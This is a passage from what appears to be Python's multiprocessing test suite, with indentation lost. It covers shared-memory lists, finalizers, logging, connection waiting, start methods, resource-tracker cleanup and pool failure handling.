self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertIsInstance(deserialized_sl, shared_memory.ShareableList)
self.assertEqual(deserialized_sl[-1], 9)
self.assertIsNot(sl, deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + 60
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
if "multiprocessing.__init__" in modules:
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
if 'multiprocessing.popen_fork' in modules:
modules.remove('multiprocessing.popen_fork')
if 'multiprocessing.popen_forkserver' in modules:
modules.remove('multiprocessing.popen_forkserver')
if 'multiprocessing.popen_spawn_posix' in modules:
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
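# Worker/manager initializer: increments a counter in the shared namespace so
# the parent can verify the initializer actually ran.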
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno()) vs. sys.stdin.close() behavior
#
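# Child helper: try to drain one item from the queue, silently ignoring an
# empty queue.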
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
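# Minimal file-like object whose write cache is keyed on the current pid, so a
# forked child starts with an empty cache instead of flushing data buffered by
# the parent.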
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
self.assertEqual(sio.getvalue(), 'foo')
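# Tests for multiprocessing.connection.wait() with pipes, sockets and process
# sentinels.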
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
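#
# Check start method and context selection (fork / spawn / forkserver)
#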
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
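#
# Check that the resource tracker cleans up leaked resources and is restarted if killed
#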
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing the process does not leak named resources (semaphores, shared memory)
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + 60
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
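#
# Check SimpleQueue.empty() as seen from the parent and from a child process
#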
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
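#
# Issue #19675: Pool creation must not leak processes started before a failure
#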
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
